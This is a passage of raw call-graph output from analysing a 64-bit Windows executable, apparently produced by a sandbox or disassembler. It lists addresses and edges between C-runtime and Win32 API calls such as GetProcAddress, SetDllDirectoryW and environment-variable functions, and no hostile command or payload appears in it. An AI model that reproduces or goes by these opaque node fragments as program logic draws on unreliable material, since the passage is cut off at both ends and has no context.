MultiByteToWideChar 18395 7ff7c5bf8171 18392->18395 18393->18394 18393->18398 18394->18392 18394->18398 18396 7ff7c5becacc _fread_nolock 12 API calls 18395->18396 18397 7ff7c5bf81a8 18395->18397 18395->18398 18396->18397 18397->18398 18399 7ff7c5bee7f0 _fread_nolock MultiByteToWideChar 18397->18399 18398->18389 18400 7ff7c5bf8216 18399->18400 18401 7ff7c5bf82f8 18400->18401 18402 7ff7c5bee7f0 _fread_nolock MultiByteToWideChar 18400->18402 18401->18398 18403 7ff7c5be9e18 __free_lconv_mon 11 API calls 18401->18403 18404 7ff7c5bf823c 18402->18404 18403->18398 18404->18401 18405 7ff7c5becacc _fread_nolock 12 API calls 18404->18405 18406 7ff7c5bf8269 18404->18406 18405->18406 18406->18401 18407 7ff7c5bee7f0 _fread_nolock MultiByteToWideChar 18406->18407 18408 7ff7c5bf82e0 18407->18408 18409 7ff7c5bf82e6 18408->18409 18410 7ff7c5bf8300 18408->18410 18409->18401 18412 7ff7c5be9e18 __free_lconv_mon 11 API calls 18409->18412 18417 7ff7c5bee010 18410->18417 18412->18401 18414 7ff7c5bf833f 18414->18398 18416 7ff7c5be9e18 __free_lconv_mon 11 API calls 18414->18416 18415 7ff7c5be9e18 __free_lconv_mon 11 API calls 18415->18414 18416->18398 18418 7ff7c5beddb8 __crtLCMapStringW 5 API calls 18417->18418 18419 7ff7c5bee04e 18418->18419 18420 7ff7c5bee056 18419->18420 18421 7ff7c5bee278 __crtLCMapStringW 5 API calls 18419->18421 18420->18414 18420->18415 18422 7ff7c5bee0bf CompareStringW 18421->18422 18422->18420 18424 7ff7c5bf6fc1 18423->18424 18425 7ff7c5bf6fda HeapSize 18423->18425 18426 7ff7c5be4444 _wfindfirst32i64 11 API calls 18424->18426 18427 7ff7c5bf6fc6 18426->18427 18428 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18427->18428 18429 7ff7c5bf6fd1 18428->18429 18429->18067 18431 7ff7c5bef9a1 18430->18431 18432 7ff7c5bef9ab 18430->18432 18434 7ff7c5becacc _fread_nolock 12 API calls 18431->18434 18433 7ff7c5bef9b0 18432->18433 18440 7ff7c5bef9b7 _wfindfirst32i64 18432->18440 18435 7ff7c5be9e18 __free_lconv_mon 11 API calls 18433->18435 18438 7ff7c5bef9a9 18434->18438 18435->18438 18436 7ff7c5bef9bd 18439 7ff7c5be4444 _wfindfirst32i64 11 API calls 18436->18439 18437 7ff7c5bef9ea HeapReAlloc 18437->18438 18437->18440 18438->18070 18439->18438 18440->18436 18440->18437 18441 7ff7c5bf26b0 _wfindfirst32i64 2 API calls 18440->18441 18441->18440 18443 7ff7c5be807d 18442->18443 18444 7ff7c5be8079 18442->18444 18463 7ff7c5bf1b7c GetEnvironmentStringsW 18443->18463 18444->18110 18455 7ff7c5be8424 18444->18455 18447 7ff7c5be8096 18470 7ff7c5be81e4 18447->18470 18448 7ff7c5be808a 18450 7ff7c5be9e18 __free_lconv_mon 11 API calls 18448->18450 18450->18444 18452 7ff7c5be9e18 __free_lconv_mon 11 API calls 18453 7ff7c5be80bd 18452->18453 18454 7ff7c5be9e18 __free_lconv_mon 11 API calls 18453->18454 18454->18444 18456 7ff7c5be8447 18455->18456 18457 7ff7c5be845e 18455->18457 18456->18110 18457->18456 18458 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18457->18458 18459 7ff7c5be84d2 18457->18459 18460 7ff7c5bee7f0 MultiByteToWideChar _fread_nolock 18457->18460 18462 7ff7c5be9e18 __free_lconv_mon 11 API calls 18457->18462 18458->18457 18461 7ff7c5be9e18 __free_lconv_mon 11 API calls 18459->18461 18460->18457 18461->18456 18462->18457 18464 7ff7c5be8082 18463->18464 18465 7ff7c5bf1ba0 18463->18465 18464->18447 18464->18448 18466 7ff7c5becacc _fread_nolock 12 API calls 18465->18466 18467 7ff7c5bf1bd7 memcpy_s 18466->18467 18468 7ff7c5be9e18 __free_lconv_mon 11 API calls 18467->18468 18469 7ff7c5bf1bf7 FreeEnvironmentStringsW 18468->18469 18469->18464 18471 7ff7c5be820c 18470->18471 18472 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18471->18472 18484 7ff7c5be8247 18472->18484 18473 7ff7c5be824f 18474 7ff7c5be9e18 __free_lconv_mon 11 API calls 18473->18474 18475 7ff7c5be809e 18474->18475 18475->18452 18476 7ff7c5be82c9 18477 7ff7c5be9e18 __free_lconv_mon 11 API calls 18476->18477 18477->18475 18478 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18478->18484 18479 7ff7c5be82b8 18480 7ff7c5be8300 11 API calls 18479->18480 18482 7ff7c5be82c0 18480->18482 18481 7ff7c5bef924 _wfindfirst32i64 37 API calls 18481->18484 18483 7ff7c5be9e18 __free_lconv_mon 11 API calls 18482->18483 18483->18473 18484->18473 18484->18476 18484->18478 18484->18479 18484->18481 18485 7ff7c5be82ec 18484->18485 18487 7ff7c5be9e18 __free_lconv_mon 11 API calls 18484->18487 18486 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 18485->18486 18488 7ff7c5be82fe 18486->18488 18487->18484 18490 7ff7c5bf7f6d __crtLCMapStringW 18489->18490 18491 7ff7c5bf646e 18490->18491 18492 7ff7c5bee010 6 API calls 18490->18492 18491->18134 18491->18135 18492->18491 18592 7ff7c5bea4a0 18593 7ff7c5bea4a5 18592->18593 18597 7ff7c5bea4ba 18592->18597 18598 7ff7c5bea4c0 18593->18598 18599 7ff7c5bea502 18598->18599 18600 7ff7c5bea50a 18598->18600 18601 7ff7c5be9e18 __free_lconv_mon 11 API calls 18599->18601 18602 7ff7c5be9e18 __free_lconv_mon 11 API calls 18600->18602 18601->18600 18603 7ff7c5bea517 18602->18603 18604 7ff7c5be9e18 __free_lconv_mon 11 API calls 18603->18604 18605 7ff7c5bea524 18604->18605 18606 7ff7c5be9e18 __free_lconv_mon 11 API calls 18605->18606 18607 7ff7c5bea531 18606->18607 18608 7ff7c5be9e18 __free_lconv_mon 11 API calls 18607->18608 18609 7ff7c5bea53e 18608->18609 18610 7ff7c5be9e18 __free_lconv_mon 11 API calls 18609->18610 18611 7ff7c5bea54b 18610->18611 18612 7ff7c5be9e18 __free_lconv_mon 11 API calls 18611->18612 18613 7ff7c5bea558 18612->18613 18614 7ff7c5be9e18 __free_lconv_mon 11 API calls 18613->18614 18615 7ff7c5bea565 18614->18615 18616 7ff7c5be9e18 __free_lconv_mon 11 API calls 18615->18616 18617 7ff7c5bea575 18616->18617 18618 7ff7c5be9e18 __free_lconv_mon 11 API calls 18617->18618 18619 7ff7c5bea585 18618->18619 18624 7ff7c5bea364 18619->18624 18638 7ff7c5bef788 EnterCriticalSection 18624->18638 14758 7ff7c5bdb19c 14779 7ff7c5bdb36c 14758->14779 14761 7ff7c5bdb2e8 14881 7ff7c5bdb69c IsProcessorFeaturePresent 14761->14881 14762 7ff7c5bdb1b8 __scrt_acquire_startup_lock 14764 7ff7c5bdb2f2 14762->14764 14771 7ff7c5bdb1d6 __scrt_release_startup_lock 14762->14771 14765 7ff7c5bdb69c 7 API calls 14764->14765 14767 7ff7c5bdb2fd _CallSETranslator 14765->14767 14766 7ff7c5bdb1fb 14768 7ff7c5bdb281 14785 7ff7c5bdb7e8 14768->14785 14770 7ff7c5bdb286 14788 7ff7c5bd1000 14770->14788 14771->14766 14771->14768 14870 7ff7c5be8984 14771->14870 14776 7ff7c5bdb2a9 14776->14767 14877 7ff7c5bdb500 14776->14877 14888 7ff7c5bdb96c 14779->14888 14782 7ff7c5bdb39b __scrt_initialize_crt 14784 7ff7c5bdb1b0 14782->14784 14890 7ff7c5bdcac8 14782->14890 14784->14761 14784->14762 14917 7ff7c5bdc210 14785->14917 14789 7ff7c5bd100b 14788->14789 14919 7ff7c5bd7600 14789->14919 14791 7ff7c5bd101d 14926 7ff7c5be4f14 14791->14926 14793 7ff7c5bd367b 14933 7ff7c5bd1af0 14793->14933 14799 7ff7c5bd3699 14862 7ff7c5bd379a 14799->14862 14949 7ff7c5bd3b20 14799->14949 14801 7ff7c5bd36cb 14801->14862 14952 7ff7c5bd6990 14801->14952 14803 7ff7c5bd36e7 14804 7ff7c5bd3733 14803->14804 14805 7ff7c5bd6990 61 API calls 14803->14805 14967 7ff7c5bd6f90 14804->14967 14810 7ff7c5bd3708 __std_exception_copy 14805->14810 14807 7ff7c5bd3748 14971 7ff7c5bd19d0 14807->14971 14810->14804 14815 7ff7c5bd6f90 58 API calls 14810->14815 14811 7ff7c5bd383d 14812 7ff7c5bd3868 14811->14812 15085 7ff7c5bd3280 14811->15085 14822 7ff7c5bd38ab 14812->14822 14982 7ff7c5bd7a30 14812->14982 14813 7ff7c5bd19d0 121 API calls 14814 7ff7c5bd377e 14813->14814 14818 7ff7c5bd37c0 14814->14818 14819 7ff7c5bd3782 14814->14819 14815->14804 14818->14811 15062 7ff7c5bd3cb0 14818->15062 15040 7ff7c5bd2770 14819->15040 14820 7ff7c5bd3888 14823 7ff7c5bd388d 14820->14823 14824 7ff7c5bd389e SetDllDirectoryW 14820->14824 14996 7ff7c5bd5e40 14822->14996 14827 7ff7c5bd2770 59 API calls 14823->14827 14824->14822 14827->14862 14830 7ff7c5bd3906 14837 7ff7c5bd39c6 14830->14837 14844 7ff7c5bd3919 14830->14844 14831 7ff7c5bd37e2 14834 7ff7c5bd2770 59 API calls 14831->14834 14834->14862 14835 7ff7c5bd38c8 14835->14830 15099 7ff7c5bd5640 14835->15099 14836 7ff7c5bd3810 14836->14811 14838 7ff7c5bd3815 14836->14838 15000 7ff7c5bd3110 14837->15000 15081 7ff7c5bdf2ac 14838->15081 14851 7ff7c5bd3965 14844->14851 15199 7ff7c5bd1b30 14844->15199 14845 7ff7c5bd38fc 15193 7ff7c5bd5890 14845->15193 14846 7ff7c5bd38dd 15119 7ff7c5bd55d0 14846->15119 14851->14862 15203 7ff7c5bd30b0 14851->15203 14852 7ff7c5bd38e7 14852->14845 14856 7ff7c5bd38eb 14852->14856 14853 7ff7c5bd39fb 14854 7ff7c5bd6990 61 API calls 14853->14854 14860 7ff7c5bd3a07 14854->14860 15187 7ff7c5bd5c90 14856->15187 14857 7ff7c5bd39a1 14861 7ff7c5bd5890 FreeLibrary 14857->14861 14860->14862 15017 7ff7c5bd6fd0 14860->15017 14861->14862 15053 7ff7c5bdad80 14862->15053 14871 7ff7c5be899b 14870->14871 14872 7ff7c5be89bc 14870->14872 14871->14768 17633 7ff7c5be90d8 14872->17633 14875 7ff7c5bdb82c GetModuleHandleW 14876 7ff7c5bdb83d 14875->14876 14876->14776 14879 7ff7c5bdb511 14877->14879 14878 7ff7c5bdb2c0 14878->14766 14879->14878 14880 7ff7c5bdcac8 __scrt_initialize_crt 7 API calls 14879->14880 14880->14878 14882 7ff7c5bdb6c2 _wfindfirst32i64 __scrt_get_show_window_mode 14881->14882 14883 7ff7c5bdb6e1 RtlCaptureContext RtlLookupFunctionEntry 14882->14883 14884 7ff7c5bdb746 __scrt_get_show_window_mode 14883->14884 14885 7ff7c5bdb70a RtlVirtualUnwind 14883->14885 14886 7ff7c5bdb778 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14884->14886 14885->14884 14887 7ff7c5bdb7ca _wfindfirst32i64 14886->14887 14887->14764 14889 7ff7c5bdb38e __scrt_dllmain_crt_thread_attach 14888->14889 14889->14782 14889->14784 14891 7ff7c5bdcad0 14890->14891 14892 7ff7c5bdcada 14890->14892 14896 7ff7c5bdce44 14891->14896 14892->14784 14897 7ff7c5bdce53 14896->14897 14898 7ff7c5bdcad5 14896->14898 14904 7ff7c5bdd080 14897->14904 14900 7ff7c5bdceb0 14898->14900 14901 7ff7c5bdcedb 14900->14901 14902 7ff7c5bdcedf 14901->14902 14903 7ff7c5bdcebe DeleteCriticalSection 14901->14903 14902->14892 14903->14901 14908 7ff7c5bdcee8 14904->14908 14909 7ff7c5bdd002 TlsFree 14908->14909 14915 7ff7c5bdcf2c __vcrt_InitializeCriticalSectionEx 14908->14915 14910 7ff7c5bdcf5a LoadLibraryExW 14912 7ff7c5bdcfd1 14910->14912 14913 7ff7c5bdcf7b GetLastError 14910->14913 14911 7ff7c5bdcff1 GetProcAddress 14911->14909 14912->14911 14914 7ff7c5bdcfe8 FreeLibrary 14912->14914 14913->14915 14914->14911 14915->14909 14915->14910 14915->14911 14916 7ff7c5bdcf9d LoadLibraryExW 14915->14916 14916->14912 14916->14915 14918 7ff7c5bdb7ff GetStartupInfoW 14917->14918 14918->14770 14921 7ff7c5bd761f 14919->14921 14920 7ff7c5bd7670 WideCharToMultiByte 14920->14921 14923 7ff7c5bd7718 14920->14923 14921->14920 14922 7ff7c5bd76c6 WideCharToMultiByte 14921->14922 14921->14923 14925 7ff7c5bd7627 __std_exception_copy 14921->14925 14922->14921 14922->14923 15258 7ff7c5bd2620 14923->15258 14925->14791 14928 7ff7c5beec40 14926->14928 14927 7ff7c5beec93 14929 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 14927->14929 14928->14927 14930 7ff7c5beece6 14928->14930 14932 7ff7c5beecbc 14929->14932 15696 7ff7c5beeb18 14930->15696 14932->14793 14934 7ff7c5bd1b05 14933->14934 14935 7ff7c5bd1b20 14934->14935 15704 7ff7c5bd24d0 14934->15704 14935->14862 14937 7ff7c5bd3ba0 14935->14937 14938 7ff7c5bdadb0 14937->14938 14939 7ff7c5bd3bac GetModuleFileNameW 14938->14939 14940 7ff7c5bd3bf2 14939->14940 14941 7ff7c5bd3bdb 14939->14941 15744 7ff7c5bd7b40 14940->15744 14942 7ff7c5bd2620 57 API calls 14941->14942 14944 7ff7c5bd3bee 14942->14944 14947 7ff7c5bdad80 _wfindfirst32i64 8 API calls 14944->14947 14946 7ff7c5bd2770 59 API calls 14946->14944 14948 7ff7c5bd3c2f 14947->14948 14948->14799 14950 7ff7c5bd1b30 49 API calls 14949->14950 14951 7ff7c5bd3b3d 14950->14951 14951->14801 14953 7ff7c5bd699a 14952->14953 14954 7ff7c5bd7a30 57 API calls 14953->14954 14955 7ff7c5bd69bc GetEnvironmentVariableW 14954->14955 14956 7ff7c5bd69d4 ExpandEnvironmentStringsW 14955->14956 14957 7ff7c5bd6a26 14955->14957 14958 7ff7c5bd7b40 59 API calls 14956->14958 14959 7ff7c5bdad80 _wfindfirst32i64 8 API calls 14957->14959 14960 7ff7c5bd69fc 14958->14960 14961 7ff7c5bd6a38 14959->14961 14960->14957 14962 7ff7c5bd6a06 14960->14962 14961->14803 15755 7ff7c5be910c 14962->15755 14965 7ff7c5bdad80 _wfindfirst32i64 8 API calls 14966 7ff7c5bd6a1e 14965->14966 14966->14803 14968 7ff7c5bd7a30 57 API calls 14967->14968 14969 7ff7c5bd6fa7 SetEnvironmentVariableW 14968->14969 14970 7ff7c5bd6fbf __std_exception_copy 14969->14970 14970->14807 14972 7ff7c5bd1b30 49 API calls 14971->14972 14973 7ff7c5bd1a00 14972->14973 14974 7ff7c5bd1b30 49 API calls 14973->14974 14980 7ff7c5bd1a7a 14973->14980 14975 7ff7c5bd1a22 14974->14975 14976 7ff7c5bd3b20 49 API calls 14975->14976 14975->14980 14977 7ff7c5bd1a3b 14976->14977 15762 7ff7c5bd17b0 14977->15762 14980->14811 14980->14813 14981 7ff7c5bdf2ac 74 API calls 14981->14980 14983 7ff7c5bd7a51 MultiByteToWideChar 14982->14983 14984 7ff7c5bd7ad7 MultiByteToWideChar 14982->14984 14985 7ff7c5bd7a9c 14983->14985 14986 7ff7c5bd7a77 14983->14986 14987 7ff7c5bd7b1f 14984->14987 14988 7ff7c5bd7afa 14984->14988 14985->14984 14993 7ff7c5bd7ab2 14985->14993 14990 7ff7c5bd2620 55 API calls 14986->14990 14987->14820 14989 7ff7c5bd2620 55 API calls 14988->14989 14991 7ff7c5bd7b0d 14989->14991 14992 7ff7c5bd7a8a 14990->14992 14991->14820 14992->14820 14994 7ff7c5bd2620 55 API calls 14993->14994 14995 7ff7c5bd7ac5 14994->14995 14995->14820 14997 7ff7c5bd5e55 14996->14997 14998 7ff7c5bd38b0 14997->14998 14999 7ff7c5bd24d0 59 API calls 14997->14999 14998->14830 15089 7ff7c5bd5ae0 14998->15089 14999->14998 15002 7ff7c5bd31c4 15000->15002 15006 7ff7c5bd3183 15000->15006 15001 7ff7c5bd3203 15004 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15001->15004 15002->15001 15003 7ff7c5bd1ab0 74 API calls 15002->15003 15003->15002 15005 7ff7c5bd3215 15004->15005 15005->14862 15010 7ff7c5bd6f20 15005->15010 15006->15002 15835 7ff7c5bd1440 15006->15835 15869 7ff7c5bd2990 15006->15869 15924 7ff7c5bd1780 15006->15924 15011 7ff7c5bd7a30 57 API calls 15010->15011 15012 7ff7c5bd6f3f 15011->15012 15013 7ff7c5bd7a30 57 API calls 15012->15013 15014 7ff7c5bd6f4f 15013->15014 15015 7ff7c5be66b4 38 API calls 15014->15015 15016 7ff7c5bd6f5d __std_exception_copy 15015->15016 15016->14853 15018 7ff7c5bd6fe0 15017->15018 15019 7ff7c5bd7a30 57 API calls 15018->15019 15020 7ff7c5bd7011 SetConsoleCtrlHandler GetStartupInfoW 15019->15020 15021 7ff7c5bd7072 15020->15021 16800 7ff7c5be9184 15021->16800 15041 7ff7c5bd2790 15040->15041 15042 7ff7c5be3be4 49 API calls 15041->15042 15043 7ff7c5bd27dd __scrt_get_show_window_mode 15042->15043 15044 7ff7c5bd7a30 57 API calls 15043->15044 15045 7ff7c5bd280a 15044->15045 15046 7ff7c5bd280f 15045->15046 15047 7ff7c5bd2849 MessageBoxA 15045->15047 15048 7ff7c5bd7a30 57 API calls 15046->15048 15049 7ff7c5bd2863 15047->15049 15050 7ff7c5bd2829 MessageBoxW 15048->15050 15051 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15049->15051 15050->15049 15052 7ff7c5bd2873 15051->15052 15052->14862 15055 7ff7c5bdad89 15053->15055 15054 7ff7c5bd37ae 15054->14875 15055->15054 15056 7ff7c5bdae40 IsProcessorFeaturePresent 15055->15056 15057 7ff7c5bdae58 15056->15057 16818 7ff7c5bdb034 RtlCaptureContext 15057->16818 15063 7ff7c5bd3cbc 15062->15063 15064 7ff7c5bd7a30 57 API calls 15063->15064 15065 7ff7c5bd3ce7 15064->15065 15066 7ff7c5bd7a30 57 API calls 15065->15066 15067 7ff7c5bd3cfa 15066->15067 16823 7ff7c5be54c8 15067->16823 15070 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15071 7ff7c5bd37da 15070->15071 15071->14831 15072 7ff7c5bd7200 15071->15072 15073 7ff7c5bd7224 15072->15073 15074 7ff7c5bdf934 73 API calls 15073->15074 15079 7ff7c5bd72fb __std_exception_copy 15073->15079 15075 7ff7c5bd723e 15074->15075 15075->15079 17202 7ff7c5be7938 15075->17202 15077 7ff7c5bdf934 73 API calls 15080 7ff7c5bd7253 15077->15080 15078 7ff7c5bdf5fc _fread_nolock 53 API calls 15078->15080 15079->14836 15080->15077 15080->15078 15080->15079 15082 7ff7c5bdf2dc 15081->15082 17217 7ff7c5bdf088 15082->17217 15084 7ff7c5bdf2f5 15084->14831 15086 7ff7c5bd3297 15085->15086 15087 7ff7c5bd32c0 15085->15087 15086->15087 15088 7ff7c5bd1780 59 API calls 15086->15088 15087->14812 15088->15086 15090 7ff7c5bd5b04 15089->15090 15094 7ff7c5bd5b31 15089->15094 15091 7ff7c5bd5b2c 15090->15091 15093 7ff7c5bd1780 59 API calls 15090->15093 15090->15094 15098 7ff7c5bd5b27 __std_exception_copy memcpy_s 15090->15098 17228 7ff7c5bd12b0 15091->17228 15093->15090 15094->15098 17254 7ff7c5bd3d30 15094->17254 15096 7ff7c5bd5b97 15097 7ff7c5bd2770 59 API calls 15096->15097 15096->15098 15097->15098 15098->14835 15112 7ff7c5bd565a memcpy_s 15099->15112 15101 7ff7c5bd577f 15103 7ff7c5bd3d30 49 API calls 15101->15103 15102 7ff7c5bd579b 15104 7ff7c5bd2770 59 API calls 15102->15104 15105 7ff7c5bd57f8 15103->15105 15110 7ff7c5bd5791 __std_exception_copy 15104->15110 15108 7ff7c5bd3d30 49 API calls 15105->15108 15106 7ff7c5bd3d30 49 API calls 15106->15112 15107 7ff7c5bd5760 15107->15101 15111 7ff7c5bd3d30 49 API calls 15107->15111 15109 7ff7c5bd5828 15108->15109 15115 7ff7c5bd3d30 49 API calls 15109->15115 15113 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15110->15113 15111->15101 15112->15101 15112->15102 15112->15106 15112->15107 15112->15112 15116 7ff7c5bd1440 161 API calls 15112->15116 15117 7ff7c5bd5781 15112->15117 17257 7ff7c5bd1650 15112->17257 15114 7ff7c5bd38d9 15113->15114 15114->14845 15114->14846 15115->15110 15116->15112 15118 7ff7c5bd2770 59 API calls 15117->15118 15118->15110 17262 7ff7c5bd71b0 15119->17262 15121 7ff7c5bd55e2 15122 7ff7c5bd71b0 58 API calls 15121->15122 15123 7ff7c5bd55f5 15122->15123 15124 7ff7c5bd561a 15123->15124 15125 7ff7c5bd560d GetProcAddress 15123->15125 15126 7ff7c5bd2770 59 API calls 15124->15126 15129 7ff7c5bd5f9c GetProcAddress 15125->15129 15130 7ff7c5bd5f79 15125->15130 15128 7ff7c5bd5626 15126->15128 15128->14852 15129->15130 15131 7ff7c5bd5fc1 GetProcAddress 15129->15131 15133 7ff7c5bd2620 57 API calls 15130->15133 15131->15130 15132 7ff7c5bd5fe6 GetProcAddress 15131->15132 15132->15130 15135 7ff7c5bd600e GetProcAddress 15132->15135 15134 7ff7c5bd5f8c 15133->15134 15134->14852 15135->15130 15136 7ff7c5bd6036 GetProcAddress 15135->15136 15136->15130 15137 7ff7c5bd605e GetProcAddress 15136->15137 15188 7ff7c5bd5cb4 15187->15188 15194 7ff7c5bd58bd 15193->15194 15195 7ff7c5bd58a2 15193->15195 15194->14830 15195->15194 15196 7ff7c5bd5980 15195->15196 17266 7ff7c5bd7190 FreeLibrary 15195->17266 15196->15194 17267 7ff7c5bd7190 FreeLibrary 15196->17267 15200 7ff7c5bd1b55 15199->15200 15201 7ff7c5be3be4 49 API calls 15200->15201 15202 7ff7c5bd1b78 15201->15202 15202->14851 17268 7ff7c5bd4960 15203->17268 15206 7ff7c5bd30fd 15206->14857 15208 7ff7c5bd30d4 15208->15206 17324 7ff7c5bd46e0 15208->17324 15277 7ff7c5bdadb0 15258->15277 15261 7ff7c5bd2669 15279 7ff7c5be3be4 15261->15279 15266 7ff7c5bd1b30 49 API calls 15267 7ff7c5bd26c8 __scrt_get_show_window_mode 15266->15267 15268 7ff7c5bd7a30 54 API calls 15267->15268 15269 7ff7c5bd26f5 15268->15269 15270 7ff7c5bd2734 MessageBoxA 15269->15270 15271 7ff7c5bd26fa 15269->15271 15273 7ff7c5bd274e 15270->15273 15272 7ff7c5bd7a30 54 API calls 15271->15272 15274 7ff7c5bd2714 MessageBoxW 15272->15274 15275 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15273->15275 15274->15273 15276 7ff7c5bd275e 15275->15276 15276->14925 15278 7ff7c5bd263c GetLastError 15277->15278 15278->15261 15283 7ff7c5be3c3e 15279->15283 15280 7ff7c5be3c63 15309 7ff7c5be9ce4 15280->15309 15282 7ff7c5be3c9f 15317 7ff7c5be1e70 15282->15317 15283->15280 15283->15282 15285 7ff7c5be3c8d 15287 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15285->15287 15286 7ff7c5be9e18 __free_lconv_mon 11 API calls 15286->15285 15289 7ff7c5bd2699 15287->15289 15297 7ff7c5bd74b0 15289->15297 15290 7ff7c5be3d48 15291 7ff7c5be3d7c 15290->15291 15293 7ff7c5be3d51 15290->15293 15291->15286 15292 7ff7c5be3da0 15292->15291 15294 7ff7c5be3daa 15292->15294 15295 7ff7c5be9e18 __free_lconv_mon 11 API calls 15293->15295 15296 7ff7c5be9e18 __free_lconv_mon 11 API calls 15294->15296 15295->15285 15296->15285 15298 7ff7c5bd74bc 15297->15298 15299 7ff7c5bd74dd FormatMessageW 15298->15299 15300 7ff7c5bd74d7 GetLastError 15298->15300 15301 7ff7c5bd7510 15299->15301 15302 7ff7c5bd752c WideCharToMultiByte 15299->15302 15300->15299 15303 7ff7c5bd2620 54 API calls 15301->15303 15304 7ff7c5bd7566 15302->15304 15305 7ff7c5bd7523 15302->15305 15303->15305 15306 7ff7c5bd2620 54 API calls 15304->15306 15307 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15305->15307 15306->15305 15308 7ff7c5bd26a0 15307->15308 15308->15266 15331 7ff7c5be9a2c 15309->15331 15313 7ff7c5be9d1f 15313->15285 15318 7ff7c5be1eae 15317->15318 15323 7ff7c5be1e9e 15317->15323 15319 7ff7c5be1eb7 15318->15319 15327 7ff7c5be1ee5 15318->15327 15320 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15319->15320 15322 7ff7c5be1edd 15320->15322 15321 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15321->15322 15322->15290 15322->15291 15322->15292 15322->15293 15323->15321 15326 7ff7c5be2194 15329 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15326->15329 15327->15322 15327->15323 15327->15326 15369 7ff7c5be2800 15327->15369 15395 7ff7c5be24c8 15327->15395 15425 7ff7c5be1d50 15327->15425 15428 7ff7c5be3a20 15327->15428 15329->15323 15332 7ff7c5be9a83 15331->15332 15333 7ff7c5be9a48 GetLastError 15331->15333 15332->15313 15337 7ff7c5be9a98 15332->15337 15334 7ff7c5be9a58 15333->15334 15344 7ff7c5bea860 15334->15344 15338 7ff7c5be9ab4 GetLastError SetLastError 15337->15338 15339 7ff7c5be9acc 15337->15339 15338->15339 15339->15313 15340 7ff7c5be9dd0 IsProcessorFeaturePresent 15339->15340 15341 7ff7c5be9de3 15340->15341 15361 7ff7c5be9ae4 15341->15361 15345 7ff7c5bea87f FlsGetValue 15344->15345 15346 7ff7c5bea89a FlsSetValue 15344->15346 15347 7ff7c5bea894 15345->15347 15349 7ff7c5be9a73 SetLastError 15345->15349 15348 7ff7c5bea8a7 15346->15348 15346->15349 15347->15346 15350 7ff7c5bedd40 _wfindfirst32i64 11 API calls 15348->15350 15349->15332 15351 7ff7c5bea8b6 15350->15351 15352 7ff7c5bea8d4 FlsSetValue 15351->15352 15353 7ff7c5bea8c4 FlsSetValue 15351->15353 15354 7ff7c5bea8f2 15352->15354 15355 7ff7c5bea8e0 FlsSetValue 15352->15355 15356 7ff7c5bea8cd 15353->15356 15357 7ff7c5bea3c4 _wfindfirst32i64 11 API calls 15354->15357 15355->15356 15358 7ff7c5be9e18 __free_lconv_mon 11 API calls 15356->15358 15359 7ff7c5bea8fa 15357->15359 15358->15349 15360 7ff7c5be9e18 __free_lconv_mon 11 API calls 15359->15360 15360->15349 15362 7ff7c5be9b1e _wfindfirst32i64 __scrt_get_show_window_mode 15361->15362 15363 7ff7c5be9b46 RtlCaptureContext RtlLookupFunctionEntry 15362->15363 15364 7ff7c5be9bb6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15363->15364 15365 7ff7c5be9b80 RtlVirtualUnwind 15363->15365 15368 7ff7c5be9c08 _wfindfirst32i64 15364->15368 15365->15364 15366 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15367 7ff7c5be9c27 GetCurrentProcess TerminateProcess 15366->15367 15368->15366 15370 7ff7c5be28b5 15369->15370 15371 7ff7c5be2842 15369->15371 15372 7ff7c5be290f 15370->15372 15373 7ff7c5be28ba 15370->15373 15374 7ff7c5be28df 15371->15374 15375 7ff7c5be2848 15371->15375 15372->15374 15384 7ff7c5be291e 15372->15384 15393 7ff7c5be2878 15372->15393 15376 7ff7c5be28ef 15373->15376 15377 7ff7c5be28bc 15373->15377 15452 7ff7c5be0db0 15374->15452 15381 7ff7c5be284d 15375->15381 15375->15384 15459 7ff7c5be09a0 15376->15459 15383 7ff7c5be28cb 15377->15383 15386 7ff7c5be285d 15377->15386 15385 7ff7c5be2890 15381->15385 15381->15386 15381->15393 15383->15374 15387 7ff7c5be28d0 15383->15387 15394 7ff7c5be294d 15384->15394 15466 7ff7c5be11c0 15384->15466 15385->15394 15444 7ff7c5be3620 15385->15444 15386->15394 15434 7ff7c5be3164 15386->15434 15387->15394 15448 7ff7c5be37b8 15387->15448 15389 7ff7c5bdad80 _wfindfirst32i64 8 API calls 15391 7ff7c5be2be3 15389->15391 15391->15327 15393->15394 15473 7ff7c5beda00 15393->15473 15394->15389 15396 7ff7c5be24d3 15395->15396 15397 7ff7c5be24e9 15395->15397 15399 7ff7c5be2527 15396->15399 15400 7ff7c5be28b5 15396->15400 15401 7ff7c5be2842 15396->15401 15398 7ff7c5be9ce4 _invalid_parameter_noinfo 37 API calls 15397->15398 15397->15399 15398->15399 15399->15327 15402 7ff7c5be290f 15400->15402 15403 7ff7c5be28ba 15400->15403 15404 7ff7c5be28df 15401->15404 15405 7ff7c5be2848 15401->15405 15402->15404 15416 7ff7c5be291e 15402->15416 15423 7ff7c5be2878 15402->15423 15406 7ff7c5be28ef 15403->15406 15407 7ff7c5be28bc 15403->15407 15409 7ff7c5be0db0 38 API calls 15404->15409 15412 7ff7c5be284d 15405->15412 15405->15416 15410 7ff7c5be09a0 38 API calls 15406->15410 15408 7ff7c5be285d 15407->15408 15414 7ff7c5be28cb 15407->15414 15411 7ff7c5be3164 47 API calls 15408->15411 15424 7ff7c5be294d 15408->15424 15409->15423 15410->15423 15411->15423 15412->15408 15415 7ff7c5be2890 15412->15415 15412->15423 15413 7ff7c5be11c0 38 API calls 15413->15423 15414->15404 15417 7ff7c5be28d0 15414->15417 15418 7ff7c5be3620 47 API calls 15415->15418 15415->15424 15416->15413 15416->15424 15420 7ff7c5be37b8 37 